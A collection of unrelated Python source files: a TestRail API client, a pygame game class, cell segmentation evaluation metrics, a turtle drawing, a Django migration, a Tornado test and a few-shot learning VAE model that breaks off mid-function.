return self._session.request(METHODS.POST, f"update_run/{run_id}", json=kwargs)
def close_run(self, run_id: int) -> Optional[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-runs#close_run
Closes an existing test run and archives its tests & results.
:param run_id: The ID of the test run
:return: response
"""
return self._session.request(METHODS.POST, f"close_run/{run_id}")
def delete_run(self, run_id: int) -> None:
"""
http://docs.gurock.com/testrail-api2/reference-runs#delete_run
Deletes an existing test run.
:param run_id: The ID of the test run
:return: response
"""
return self._session.request(METHODS.POST, f"delete_run/{run_id}")
class Sections(_MetaCategory):
"""http://docs.gurock.com/testrail-api2/reference-runs"""
def get_section(self, section_id: int) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-sections#get_section
Returns an existing section.
:param section_id: The ID of the section
:return: response
"""
return self._session.request(METHODS.GET, f"get_section/{section_id}")
def get_sections(self, project_id: int, **kwargs) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-sections#get_sections
Returns a list of sections for a project and test suite.
:param project_id: The ID of the project
:param kwargs:
:key suite_id: The ID of the test suite (optional if the project is operating in single suite mode)
:return: response
"""
return self._session.request(
METHODS.GET, f"get_sections/{project_id}", params=kwargs
)
def add_section(self, project_id: int, name: str, **kwargs) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-sections#add_section
Creates a new section.
:param project_id: The ID of the project
:param name: The name of the section (required)
:key description: str - The description of the section (added with TestRail 4.0)
:key suite_id: int - The ID of the test suite (ignored if the project is operating in single suite mode,
required otherwise)
:key parent_id: int - The ID of the parent section (to build section hierarchies)
:return: response
"""
data = dict(name=name, **kwargs)
return self._session.request(
METHODS.POST, f"add_section/{project_id}", json=data
)
def update_section(self, section_id: int, **kwargs) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-sections#update_section
Updates an existing section (partial updates are supported,
i.e. you can submit and update specific fields only).
:param section_id: The ID of the section
:key name: str - The name of the section
:key description: str - The description of the section (added with TestRail 4.0)
:return: response
"""
return self._session.request(
METHODS.POST, f"update_section/{section_id}", json=kwargs
)
def delete_section(self, section_id: int) -> None:
"""
http://docs.gurock.com/testrail-api2/reference-sections#delete_section
Deletes an existing section.
:param section_id: The ID of the section
:return: response
"""
return self._session.request(METHODS.POST, f"delete_section/{section_id}")
class Statuses(_MetaCategory):
"""http://docs.gurock.com/testrail-api2/reference-sections"""
def get_statuses(self) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-statuses#get_statuses
Returns a list of available test statuses.
:return: response
"""
return self._session.request(METHODS.GET, "get_statuses")
class Suites(_MetaCategory):
"""http://docs.gurock.com/testrail-api2/reference-suites"""
def get_suite(self, suite_id: int) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-suites#get_suite
Returns an existing test suite.
:param suite_id: The ID of the test suite
:return: response
"""
return self._session.request(METHODS.GET, f"get_suite/{suite_id}")
def get_suites(self, project_id: int) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-suites#get_suites
Returns a list of test suites for a project.
:param project_id: The ID of the project
:return: response
"""
return self._session.request(METHODS.GET, f"get_suites/{project_id}")
def add_suite(self, project_id: int, name: str, **kwargs) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-suites#add_suite
Creates a new test suite.
:param project_id: The ID of the project the test suite should be added to
:param name: The name of the test suite (required)
:key description: str - The description of the test suite
:return: response
"""
data = dict(name=name, **kwargs)
return self._session.request(METHODS.POST, f"add_suite/{project_id}", json=data)
def update_suite(self, suite_id: int, **kwargs) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-suites#update_suite
Updates an existing test suite (partial updates are supported,
i.e. you can submit and update specific fields only).
:param suite_id: The ID of the test suite
:param kwargs: This methods supports the same POST fields as add_suite.
:return: response
"""
return self._session.request(
METHODS.POST, f"update_suite/{suite_id}", json=kwargs
)
def delete_suite(self, suite_id: int) -> None:
"""
http://docs.gurock.com/testrail-api2/reference-suites#delete_suite
Deletes an existing test suite.
:param suite_id: The ID of the test suite
:return: response
"""
return self._session.request(METHODS.POST, f"delete_suite/{suite_id}")
class Template(_MetaCategory):
"""http://docs.gurock.com/testrail-api2/reference-templates"""
def get_templates(self, project_id: int) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-templates#get_templates
Returns a list of available templates (requires TestRail 5.2 or later).
:param project_id: The ID of the project
:return: response
"""
return self._session.request(METHODS.GET, f"get_templates/{project_id}")
class Tests(_MetaCategory):
"""http://docs.gurock.com/testrail-api2/reference-tests"""
def get_test(self, test_id: int) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-tests#get_test
Returns an existing test.
If you interested in the test results rather than the tests, please see get_results instead.
:param test_id: The ID of the test
:return: response
"""
return self._session.request(METHODS.GET, f"get_test/{test_id}")
def get_tests(self, run_id: int, **kwargs) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-tests#get_tests
Returns a list of tests for a test run.
:param run_id: The ID of the test run
:param kwargs: filters
:key status_id: int(list) - A comma-separated list of status IDs to filter by.
:return: response
"""
return self._session.request(METHODS.GET, f"get_tests/{run_id}", params=kwargs)
class Users(_MetaCategory):
"""http://docs.gurock.com/testrail-api2/reference-users"""
def get_user(self, user_id: int) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-users#get_user
Returns an existing user.
:param user_id: The ID of the user
:return: response
"""
return self._session.request(METHODS.GET, f"get_user/{user_id}")
def get_user_by_email(self, email: str) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-users#get_user_by_email
Returns an existing user by his/her email address.
:param email: The email address to get the user for
:return: response
"""
return self._session.request(
METHODS.GET, f"get_user_by_email", params={"email": email}
)
def get_users(self) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-users#get_users
Returns a list of users.
:return: response
"""
return self._session.request(METHODS.GET, "get_users")
class Attachments(_MetaCategory):
"""http://docs.gurock.com/testrail-api2/reference-attachments"""
def add_attachment_to_result(self, result_id: int, path: Union[str, Path]) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-attachments#add_attachment_to_result
Adds attachment to a result based on the result ID. The maximum allowable upload size is set to 256mb.
:param result_id: The ID of the result the attachment should be added to
:param path: The path to the file
:return: response
"""
return self._session.attachment_request(
METHODS.POST, f"add_attachment_to_result/{result_id}", path
)
def get_attachments_for_case(self, case_id: int) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-attachments#get_attachments_for_case
Returns a list of attachments for a test case.
:param case_id: The ID of the test case
:return: response
"""
return self._session.request(METHODS.GET, f"get_attachments_for_case/{case_id}")
def get_attachments_for_test(self, test_id: int) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-attachments#get_attachments_for_test
Returns a list of attachments for test results.
:param test_id:
:return: response
"""
return self._session.request(METHODS.GET, f"get_attachments_for_test/{test_id}")
def get_attachment(self, attachment_id: int, path: Union[str, Path]) -> Path:
"""
http://docs.gurock.com/testrail-api2/reference-attachments#get_attachment
Returns the requested attachment identified by attachment_id.
:param attachment_id:
:param path: Path
:return: Path
"""
return self._session.get_attachment(
METHODS.GET, f"get_attachment/{attachment_id}", path
)
def delete_attachment(self, attachment_id: int) -> None:
"""
http://docs.gurock.com/testrail-api2/reference-attachments#delete_attachment
Deletes the specified attachment identified by attachment_id.
:param attachment_id:
:return: None
"""
return self._session.request(METHODS.POST, f"delete_attachment/{attachment_id}")
class Reports(_MetaCategory):
"""http://docs.gurock.com/testrail-api2/reference-reports"""
def get_reports(self, project_id: int) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-reports#get_reports
Returns a list of API available reports by project.
:param project_id: The ID of the project for which you want a list of API accessible reports
:return: response
"""
return self._session.request(METHODS.GET, f"get_reports/{project_id}")
def run_report(self, report_template_id: int) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-reports#run_report
Executes the report identified using the :report_id parameter and returns URL's for
accessing the report in HTML and PDF format.
:param report_template_id:
:return: response
"""
return self._session.request(METHODS.GET, f"run_report/{report_template_id}")
|
import pygame
from Board.Buildings.Building import Building
class Base(Building):
def __init__(self, player, tile):
self.Textures = [
pygame.transform.scale(pygame.image.load('images/buildings/baseGreen.png').convert_alpha(), [45, 45]),
pygame.transform.scale(pygame.image.load('images/buildings/baseBlue.png').convert_alpha(), [45, 45]),
pygame.transform.scale(pygame.image.load('images/buildings/baseYellow.png').convert_alpha(), [45, 45]),
pygame.transform.scale(pygame.image.load('images/buildings/baseRed.png').convert_alpha(), [45, 45])
]
super().__init__(player, tile, self.Textures)
|
print("Primul curs") |
import numpy as np
import pickle
from experiments.dev import sampling
from scipy.optimize import linear_sum_assignment
import torch
import matplotlib.pyplot as plt
from tqdm import tqdm, trange
def predict_segmentations(dataset, model, device, iou_threshold, min_objprob, num_proposals):
"""Predict the segmentation for all images in the dataset.
Parameters:
dataset -- dataset.Dataset instance
model -- multitaskmodel.Multitaskmodel instance
device -- cuda device
iou_threshold -- intersection over union threshold
min_objprob -- minimum required object probability to sample
num_proposals -- number of proposals to generate
Returns: list of arrays of shapes (num_pred_cells, height, width) with predicted segmentations
"""
model = model.to(device)
pred_segmentation_stack = []
labels_stack = []
num_images = dataset.images.shape[0]
for i in tqdm(range(num_images)):
# get and normalize image, convert to tensor
img = dataset.images[i]
img = (img - dataset.min_max_value[0]) / (dataset.min_max_value[1] - dataset.min_max_value[0])
img = torch.from_numpy(img).to(device)
# predict features
pred_overlap, pred_stardist, pred_objprob = model(img.unsqueeze(0))
pred_overlap = torch.sigmoid(pred_overlap).cpu().detach().numpy()
pred_objprob = torch.sigmoid(pred_objprob).cpu().detach().numpy()
pred_stardist = pred_stardist.cpu().detach().numpy()
# find segmentation with non-maximum suppression
pred_segmentation, _ = sampling.nms(pred_overlap[0, 0], pred_stardist[0], pred_objprob[0, 0], num_proposals, iou_threshold, min_objprob)
pred_segmentation_stack.append(pred_segmentation)
labels_stack.append(dataset.labels[i])
return pred_segmentation_stack, labels_stack
def optimal_assignment_dice(pred_segmentation, labels):
"""Find the optimal assignment of predictions and labels wrt dice coefficient with the Hungarian algorithm.
Parameters:
pred_segmentation -- array of shape (num_pred_cells, H, W) with predicted segmentation masks
labels -- array of shape (num_gt_cells, H, W) with gt segmentation masks
Returns: list with detected gt cell indies, list with matched predicted cell indices,
list with corresponding dice coefficients
"""
assert pred_segmentation.shape[1:] == labels.shape[1:]
num_cells_pred = pred_segmentation.shape[0]
num_cells_gt = labels.shape[0]
# table for the dice coefficients of all predicted - gt combinations
coefficients = np.zeros((num_cells_gt, num_cells_pred))
# iterate over ground truth objects
for i in range(num_cells_gt):
# make as many copies of ground truth label i as there are predicted cells
gt_cell = np.repeat(labels[i][np.newaxis, :, :], num_cells_pred, axis=0)
# compute the dice coefficient between every predicted cell and the ground truth cell i
dc = (
2 * np.count_nonzero(np.logical_and(gt_cell, pred_segmentation), axis=(1,2)) /
(np.count_nonzero(gt_cell, axis=(1, 2)) + np.count_nonzero(pred_segmentation, axis=(1,2)))
)
# set i-th row of coefficient table to the determined coefficients
coefficients[i, :] = dc
# find the optimal assignment between gt cells and predicted cells to maximize the sum of dice coefficients
gt_order, pred_order = linear_sum_assignment(coefficients, maximize=False)
# pick the dice coefficients of the optimal assignment
dice = coefficients[gt_order, pred_order]
return gt_order, pred_order, dice
def optimal_assignment_iou(pred_segmentation, labels):
"""Find the optimal assignment of predictions and labels wrt IoU with the Hungarian algorithm.
Parameters:
pred_segmentation -- array of shape (num_pred_cells, H, W) with predicted segmentation masks
labels -- array of shape (num_gt_cells, H, W) with gt segmentation masks
Returns: list with detected gt cell indies, list with matched predicted cell indices,
list with corresponding iou scores
"""
assert pred_segmentation.shape[1:] == labels.shape[1:]
num_cells_pred = pred_segmentation.shape[0]
num_cells_gt = labels.shape[0]
# table for the iou scores of all predicted - gt combinations
scores = np.zeros((num_cells_gt, num_cells_pred))
# iterate over ground truth objects
for i in range(num_cells_gt):
# make as many copies of ground truth label i as there are predicted cells
gt_cell = np.repeat(labels[i][np.newaxis, :, :], num_cells_pred, axis=0)
# compute the iou score between every predicted cell and the ground truth cell i
iou = (
np.count_nonzero(np.logical_and(gt_cell, pred_segmentation), axis=(1,2)) /
np.count_nonzero(gt_cell + pred_segmentation, axis=(1,2))
)
# set i-th row of scores table to the determined iou scores
scores[i, :] = iou
# find the optimal assignment between gt cells and predicted cells to maximize the sum of dice coefficients
gt_order, pred_order = linear_sum_assignment(scores, maximize=True)
# pick the dice coefficients of the optimal assignment
iou_scores = scores[gt_order, pred_order]
return gt_order, pred_order, iou_scores
def hungry_assignment_dice(pred_segmentation, labels):
"""Compute the "hungry" assignment of predicted objects to gt objects using dice coefficient.
This means that in the order of gt objects, every object gets its best match (irrespective of
whether this prediction better matches an object that comes later)
Parameters:
pred_segmentation -- array of shape (num_pred_cells, H, W) with predicted segmentation masks
labels -- array of shape (num_gt_cells, H, W) with gt segmentation masks
Returns: list with detected gt cell indies, list with matched predicted cell indices,
list with corresponding dice coefficients
"""
assert pred_segmentation.shape[1:] == labels.shape[1:]
num_gt_objects = labels.shape[0]
num_pred_objects = pred_segmentation.shape[0]
gt_order = []
pred_order = []
dice_coefficients = []
# iterate over all ground truth objects
for i in range(num_gt_objects):
max_dc = 0
max_index = -1
# iterate over all predicted objects
for j in range(num_pred_objects):
# skip this object if already matched to gt object
if j in pred_order:
continue
# compute dice coefficient
dc = (
2 * np.count_nonzero(np.logical_and(labels[i], pred_segmentation[j])) /
(np.count_nonzero(labels[i]) + np.count_nonzero(pred_segmentation[j]))
)
# check if best matching so far
if dc > max_dc:
max_dc = dc
max_index = j
# if a predicted object could be matched, add to list
if max_dc != 0:
gt_order.append(i)
pred_order.append(max_index)
dice_coefficients.append(max_dc)
return np.array(gt_order), np.array(pred_order), np.array(dice_coefficients)
def hungry_assignment_iou(pred_segmentation, labels):
"""Compute the "hungry" assignment of predicted objects to gt objects using IoU.
Parameters:
pred_segmentation -- array of shape (num_pred_cells, H, W) with predicted segmentation masks
labels -- array of shape (num_gt_cells, H, W) with gt segmentation masks
Returns: list with detected gt cell indies, list with matched predicted cell indices,
list with corresponding IoU scores
"""
assert pred_segmentation.shape[1:] == labels.shape[1:]
num_gt_objects = labels.shape[0]
num_pred_objects = pred_segmentation.shape[0]
gt_order = []
pred_order = []
iou_scores = []
# iterate over all ground truth objects
for i in range(num_gt_objects):
max_iou = 0
max_index = -1
# iterate over all predicted objects
for j in range(num_pred_objects):
# skip this object if already matched to gt object
if j in pred_order:
continue
# compute iou score
iou = (
np.count_nonzero(np.logical_and(labels[i], pred_segmentation[j])) /
np.count_nonzero(np.logical_or(labels[i], pred_segmentation[j]))
)
# check if best matching so far
if iou > max_iou:
max_iou = iou
max_index = j
# if a predicted object could be matched
if max_iou != 0:
gt_order.append(i)
pred_order.append(max_index)
iou_scores.append(max_iou)
return np.array(gt_order), np.array(pred_order), np.array(iou_scores)
def prediction_grid(dataset, model, device, nms_thresholds, min_objprobs, num_proposals):
"""Generate predictions on the complete dataset for different parameters.
Parameters:
dataset -- dataset.Dataset instance
model -- multitaskmodel.MultitaskModel instance
device -- cuda device
nms_thresholds -- list with IoU thresholds for non-maximum suppression
min_objprobs -- list with minimum object probabilities for sampling proposals
num_proposals -- number of proposals to generate per image
Returns: 2d list with complete dataset segmentations for different values nms_thresholds and
min_objprobs, labels
"""
predictions = []
for i, nms_threshold in enumerate(tqdm(nms_thresholds)):
predictions.append([])
for j, min_objprob in enumerate(tqdm(min_objprobs)):
prediction, labels = predict_segmentations(dataset, model, device, nms_threshold, min_objprob, num_proposals)
predictions[-1].append(prediction)
return predictions, labels
def save_prediction(file, predictions, labels, nms_thresholds, min_objprobs, num_proposals):
"""Save prediction and parameters with pickle."""
data = {"predictions":predictions, "labels":labels, "nms_thresholds":nms_thresholds, "min_objprobs":min_objprobs, "num_proposals":num_proposals}
pickle.dump(data, open(file, 'wb'))
def get_precisions(pred_segmentation_stack, labels_stack, matching_thresholds):
"""Compute the average precision of detections on a number of images and average, defined as tp / (tp + fp + fn).
tp: number of matches (gt object with predicted object such that IoU > threshold)
fp: number of unmatched predicted objects
fn: number of unmatched gt objects
Parameters:
pred_segmentation_stack -- list of arrays, with each array having shape (num_pred_cells, height, width)
labels_stack -- list of arrays, with each array having shape (num_gt_cells, height, width)
matching_thresholds -- list of thresholds above which a two objects are considered a match
Returns: average precisions, standard deviation
"""
assert len(pred_segmentation_stack) == len(labels_stack)
num_images = len(labels_stack)
num_thresholds = len(matching_thresholds)
precisions = np.zeros((num_images, num_thresholds))
tp = np.zeros(num_thresholds)
fp = np.zeros(num_thresholds)
fn = np.zeros(num_thresholds)
for i in range(num_images):
gt_order, pred_order, iou_scores = optimal_assignment_iou(pred_segmentation_stack[i], labels_stack[i])
gt_order = np.array(gt_order)
pred_order = np.array(pred_order)
iou_scores = np.array(iou_scores)
for j, threshold in enumerate(matching_thresholds):
tp[j] = (iou_scores > threshold).sum()
fp[j] = len(pred_segmentation_stack[i]) - (iou_scores > threshold).sum()
fn[j] = len(labels_stack[i]) - (iou_scores > threshold).sum()
precisions[i,:] = tp / (tp + fp + fn)
return precisions.mean(axis=0), precisions.std(axis=0)
def get_isbi_metrics(pred_segmentation_stack, labels_stack):
"""Compute the metrics from the ISBI challenge:
- average dice coefficient of all matchings with IoU > 0.7
- object-based false negative rate (missed gt cells and matchings with IoU < 0.7)
- average pixel-based true positive rate of all matchings with IoU > 0.7
- average pixel-based false positive rate of all matchings with IoU > 0.7
Parameters:
pred_segmentation_stack -- list of arrays, with each array having shape (num_pred_cells, height, width)
labels_stack -- list of arrays, with each array having shape (num_gt_cells, height, width)
Returns: dc, dc_std, fnr fnr_std, tpr, tpr_std, fpr, fpr_std
"""
assert len(pred_segmentation_stack) == len(labels_stack)
num_images = len(labels_stack)
qualified_dc_list = []
qualified_tpr_list = []
qualified_fpr_list = []
num_gt_objects = 0
fnr_images = []
for i in range(num_images):
gt_order, pred_order, _ = hungry_assignment_iou(pred_segmentation_stack[i], labels_stack[i])
num_matchings = gt_order.shape[0]
num_gt_objects += labels_stack[i].shape[0]
num_gt_objects_i = labels_stack[i].shape[0]
num_qualified_i = 0
for j in range(num_matchings):
prediction = pred_segmentation_stack[i][pred_order][j].astype('bool')
gt = labels_stack[i][gt_order][j].astype('bool')
dc = 2 * np.count_nonzero(np.logical_and(prediction, gt)) / (np.count_nonzero(prediction) + np.count_nonzero(gt))
if dc < 0.7:
continue
diff = np.logical_xor(prediction, gt)
# pixel-based metris
tp = np.logical_and(prediction, gt).sum()
tn = np.logical_and(np.invert(gt), np.invert(prediction)).sum()
fp = np.logical_and(diff, prediction).sum()
fn = np.logical_and(diff, gt).sum()
qualified_dc_list.append(dc)
qualified_tpr_list.append(tp / (tp + fn))
qualified_fpr_list.append(fp / (fp + tn))
num_qualified_i += 1
fnr_images.append((num_gt_objects_i - num_qualified_i) / num_gt_objects_i)
dc_average = np.array(qualified_dc_list).mean()
dc_std = np.array(qualified_dc_list).std()
fnr = (num_gt_objects - len(qualified_dc_list)) / num_gt_objects
fnr_std = np.array(fnr_images).std()
tpr_average = np.array(qualified_tpr_list).mean()
tpr_std = np.array(qualified_tpr_list).std()
fpr_average = np.array(qualified_fpr_list).mean()
fpr_std = np.array(qualified_fpr_list).std()
return round(dc_average, 5), round(dc_std, 5), round(fnr, 5), round(fnr_std, 5), round(tpr_average, 5), round(tpr_std, 5), round(fpr_average, 5), round(fpr_std, 5)
def scores_prediction_grid(predictions, labels):
"""Compute the metrics from the ISBI15 challenge on a number of predictions for different parameters, as returned by prediction_grid().
Parameters:
predictions -- 2d list of predictions on the complete dataset
labels -- list with arrays of labels for every image
Returns: arrays dc, dc_std, fnr, fnr_std, tpr, tpr_std, fpr, fpr_std
"""
dc = np.empty((len(predictions), len(predictions[0])))
dc_std = np.empty((len(predictions), len(predictions[0])))
fnr = np.empty((len(predictions), len(predictions[0])))
fnr_std = np.empty((len(predictions), len(predictions[0])))
tpr = np.empty((len(predictions), len(predictions[0])))
tpr_std = np.empty((len(predictions), len(predictions[0])))
fpr = np.empty((len(predictions), len(predictions[0])))
fpr_std = np.empty((len(predictions), len(predictions[0])))
for i in trange(len(predictions)):
for j in trange(len(predictions[0])):
dc[i, j], dc_std[i, j], fnr[i, j], fnr_std[i, j], tpr[i, j], tpr_std[i, j], fpr[i, j], fpr_std[i, j] = get_isbi_metrics(predictions[i][j], labels)
return dc, dc_std, fnr, fnr_std, tpr, tpr_std, fpr, fpr_std
def precision_prediction_grid(predictions, labels, matching_thresholds):
"""Compute the average precision on a number of predictions for different parameters, as returned by prediction_grid().
Parameters:
predictions -- 2d list of predictions on the complete dataset
labels -- list with arrays of labels for every image
Returns: array with average precisions, array with std's
"""
num_nms_thresholds = len(predictions)
num_min_objprobs = len(predictions[0])
num_matching_thresholds = len(matching_thresholds)
precisions = np.zeros((num_nms_thresholds, num_min_objprobs, num_matching_thresholds))
precisions_std = np.zeros((num_nms_thresholds, num_min_objprobs, num_matching_thresholds))
for i in trange(num_nms_thresholds):
for j in trange(num_min_objprobs):
precisions[i,j,:], precisions_std[i,j,:] = get_precisions(predictions[i][j], labels, matching_thresholds)
return precisions, precisions_std
def save_isbi_metrics(file, dc, dc_std, fnr, fnr_std, tpr, tpr_std, fpr, fpr_std, nms_thresholds, min_objprobs, num_proposals):
"""Save isbi metrics and parameters with pickle."""
data = {"dc":dc, "dc_std":dc_std, "fnr":fnr, "fnr_std":fnr_std, "tpr":tpr, "tpr_std":tpr_std, "fpr":fpr, "fpr_std":fpr_std, "nms_thresholds":nms_thresholds, "min_objprobs":min_objprobs, "num_proposals":num_proposals}
pickle.dump(data, open(file, 'wb'))
def save_precisions(file, precisions, precisions_std, nms_thresholds, min_objprobs, num_proposals, matching_thresholds):
"""Save precisions and parameters with pickle"""
data = {"precision":precisions, "precision_std":precisions_std, "nms_thresholds":nms_thresholds, "min_objprobs":min_objprobs, "num_proposals":num_proposals, "matching_thresholds":matching_thresholds}
pickle.dump(data, open(file, 'wb'))
|
import turtle
import math
import random
bob = turtle.Turtle()
bob.speed(15)
turtle.getscreen().bgcolor("black")
turtle.hideturtle()
colors = ["yellow", "red", "green", "blue", "orange", "violet", "indigo"]
for i in range(30):
if i%2 == 0:
bob.hideturtle()
bob.circle(100)
bob.color(random.choice(colors))
bob.left(45)
else:
bob.hideturtle()
bob.circle(-100)
bob.color(random.choice(colors))
bob.left(45)
turtle.done()
|
# Generated by Django 3.0 on 2020-03-20 09:15
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('blog', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='comment',
name='created_date',
field=models.DateTimeField(default=datetime.datetime(2020, 3, 20, 9, 15, 54, 879816, tzinfo=utc)),
),
migrations.AlterField(
model_name='post',
name='created_date',
field=models.DateTimeField(default=datetime.datetime(2020, 3, 20, 9, 15, 54, 879816, tzinfo=utc)),
),
]
|
from tornado import gen, testing
from tornado.testing import gen_test
import tornado
import tornado.ioloop
import tornado.httpclient
import ujson as json
class MyTestCase(testing.AsyncTestCase):
client = testing.AsyncHTTPClient()
name = 'mercedes15'
url = "http://localhost:8098/types/cars/buckets/sport/keys/{}".format(name)
def setUp(self):
print("Setting up")
super().setUp()
tornado.ioloop.IOLoop.current().run_sync(self.put)
def tearDown(self):
print("Tearing down")
super().tearDown()
request = tornado.httpclient.HTTPRequest(self.url, method='DELETE')
response = yield self.client.fetch(request)
print("Response just after sending DELETE {}".format(response))
tornado.ioloop.IOLoop.current().stop()
@gen.coroutine
def put(self):
print("Putting")
data = '{"name_s":' + self.name + ', "model_i":2018, "leader_b":true}'
headers = {'Content-Type': 'application/json'}
request = tornado.httpclient.HTTPRequest(self.url, method='PUT', headers=headers, body=json.dumps(data))
response = yield self.client.fetch(request)
print("Response just after sending PUT {}".format(response))
return response
@gen_test
def test_find_one(self):
print("Finding")
response = yield self.client.fetch(
"http://localhost:8098/search/query/famous?wt=json&q=name_s:{}".format(self.name))
print(response)
self.assertIn("name_s:{}".format(self.name), str(response.body)) |
import torch
import torch.nn as nn
import torchvision
import torchvision.transforms as transforms
from torch.autograd import Variable
import numpy as np
import os
from PIL import Image
import torchvision.datasets as dset
import torch.nn.functional as F
from torch.utils.data import DataLoader,Dataset
import random
import matplotlib.pyplot as plt
from torch.utils.data.sampler import Sampler
class Rotate(object):
def __init__(self, angle):
self.angle = angle
def __call__(self, x, mode="reflect"):
x = x.rotate(self.angle)
return x
def data_folders(data_folder='dir/to/dataset'):
dataset_name = data_folder.split('/')[-1]
character_folders = [os.path.join(data_folder, family) \
for family in os.listdir(data_folder) \
if os.path.isdir(os.path.join(data_folder, family))]
random.seed(1)
random.shuffle(character_folders)
num_train = 36
metatrain_character_folders = character_folders[:num_train]
metaval_character_folders = character_folders[num_train:]
return metatrain_character_folders,metaval_character_folders
def get_data_loader(task, dataset_name, num_per_class=1, split='train',shuffle=True,rotation=0):
normalize = transforms.Normalize(mean=[0.92206, 0.92206, 0.92206], std=[0.08426, 0.08426, 0.08426])
dataset = Omniglot(task,split=split,transform=transforms.Compose([Rotate(rotation),transforms.ToTensor(),normalize]))
if split == 'train':
sampler = ClassBalancedSampler(num_per_class, task.num_classes, task.train_num,shuffle=shuffle)
else:
sampler = ClassBalancedSampler(num_per_class, task.num_classes, task.test_num,shuffle=shuffle)
loader = DataLoader(dataset, batch_size=num_per_class*task.num_classes, sampler=sampler)
return loader
class create_task(object):
def __init__(self, character_folders, num_classes, train_num,test_num):
self.character_folders = character_folders
self.num_classes = num_classes
self.train_num = train_num
self.test_num = test_num
class_folders = random.sample(self.character_folders,self.num_classes)
labels = np.array(range(len(class_folders)))
labels = dict(zip(class_folders, labels))
samples = dict()
self.train_roots = []
self.test_roots = []
for c in class_folders:
temp = [os.path.join(c, x) for x in os.listdir(c)]
samples[c] = random.sample(temp, len(temp))
self.train_roots += samples[c][:train_num]
self.test_roots += samples[c][train_num:train_num+test_num]
self.train_labels = [labels[self.get_class(x)] for x in self.train_roots]
self.test_labels = [labels[self.get_class(x)] for x in self.test_roots]
def get_class(self, sample):
return os.path.join(*sample.split('/')[:-1])
class FewShotDataset(Dataset):
def __init__(self, task, split='train', transform=None, target_transform=None):
self.transform = transform # Torch operations on the input image
self.target_transform = target_transform
self.task = task
self.split = split
self.image_roots = self.task.train_roots if self.split == 'train' else self.task.test_roots
self.labels = self.task.train_labels if self.split == 'train' else self.task.test_labels
def __len__(self):
return len(self.image_roots)
def __getitem__(self, idx):
raise NotImplementedError("You need to specify the dataset")
class Omniglot(FewShotDataset):
def __init__(self, *args, **kwargs):
super(Omniglot, self).__init__(*args, **kwargs)
def __getitem__(self, idx):
image_root = self.image_roots[idx]
image = Image.open(image_root)
image = image.convert('RGB')
image = image.resize((84,84), resample=Image.LANCZOS)
if self.transform is not None:
image = self.transform(image)
label = self.labels[idx]
if self.target_transform is not None:
label = self.target_transform(label)
return image, label
class ClassBalancedSampler(Sampler):
def __init__(self, num_per_class, num_cl, num_inst,shuffle=True):
self.num_per_class = num_per_class
self.num_cl = num_cl
self.num_inst = num_inst
self.shuffle = shuffle
def __iter__(self):
# return a single list of indices, assuming that items will be grouped by class
if self.shuffle:
batch = [[i+j*self.num_inst for i in torch.randperm(self.num_inst)[:self.num_per_class]] for j in range(self.num_cl)]
else:
batch = [[i+j*self.num_inst for i in range(self.num_inst)[:self.num_per_class]] for j in range(self.num_cl)]
batch = [item for sublist in batch for item in sublist]
if self.shuffle:
random.shuffle(batch)
return iter(batch)
def __len__(self):
return 1
def conv_block(in_channels, out_channels):
return nn.Sequential(
nn.Conv2d(in_channels, out_channels, 3, padding=1),
nn.BatchNorm2d(out_channels),
nn.ReLU(),
nn.MaxPool2d(2))
class VAE(nn.Module):
def __init__(self):
super().__init__()
self.pn = nn.Sequential(conv_block(3, 64),conv_block(64, 64),conv_block(64, 64),conv_block(64, 64))
self.fc1 = nn.Linear(64*5*5, 256)
self.fc21 = nn.Linear(64*5*5, 256)
self.fc22 = nn.Linear(1600, 256)
self.fc3 = nn.Linear(64, 256)
self.fc4 = nn.Linear(256, 64*5*5)
self.relu = nn.ReLU()
def encode(self, x):
label = x[1]
x_ = x[0]
if label == 'support':
emb_x = self.pn(x_)
emb_x = emb_x.view(emb_x.shape[0],-1)
elif label == 'query':
emb_x = self.pn(x_)
emb_x = emb_x.view(emb_x.shape[0],-1)
h1 = self.relu(emb_x)
return emb_x,self.fc21(h1), self.fc22(h1)
def reparameterize(self, mu, logvar):
std = logvar.mul(0.5).exp_()
eps = Variable(std.data.new(std.size()).normal_())
return eps.mul(std).add_(mu)
def decode(self, z):
h3 = F.relu(z)
return torch.sigmoid(self.fc4(h3)).view(-1,64*5*5)
def forward(self, x):
emb_x, mu, logvar = self.encode(x)
z = self.reparameterize(mu, logvar)
return emb_x, self.decode(z), mu, logvar
class Loss(nn.Module):
def __init__(self):
super().__init__()
self.mse_loss = nn.MSELoss(size_average=False)
self.rec_loss = nn.BCELoss(size_average=False)
def calculate_dist(self, a, b):
#a: query(多的) b:support(少的)
#way = int(b.shape[0]/5)
#shot = 5
#b = b.reshape(shot, way, -1).mean(dim=0)
a = a.unsqueeze(1).expand(a.shape[0], b.shape[0], -1)
b = b.unsqueeze(0).expand(a.shape[0], b.shape[0], -1)
logits = -torch.pow(a-b,2).sum(2)
return logits
def forward(self,embedding_support, recon_support, mu_support, logvar_support, x_support, embedding_query,recon_query, mu_query, logvar_query, x_query, labels):
MSE_support = self.mse_loss(recon_support, embedding_support)/x_support.shape[0]
MSE_query = self.mse_loss(recon_query, embedding_query)/x_query.shape[0]
MSE = MSE_support + MSE_query
logits = self.calculate_dist(mu_query,mu_support)
CE = torch.nn.functional.cross_entropy(logits,labels)
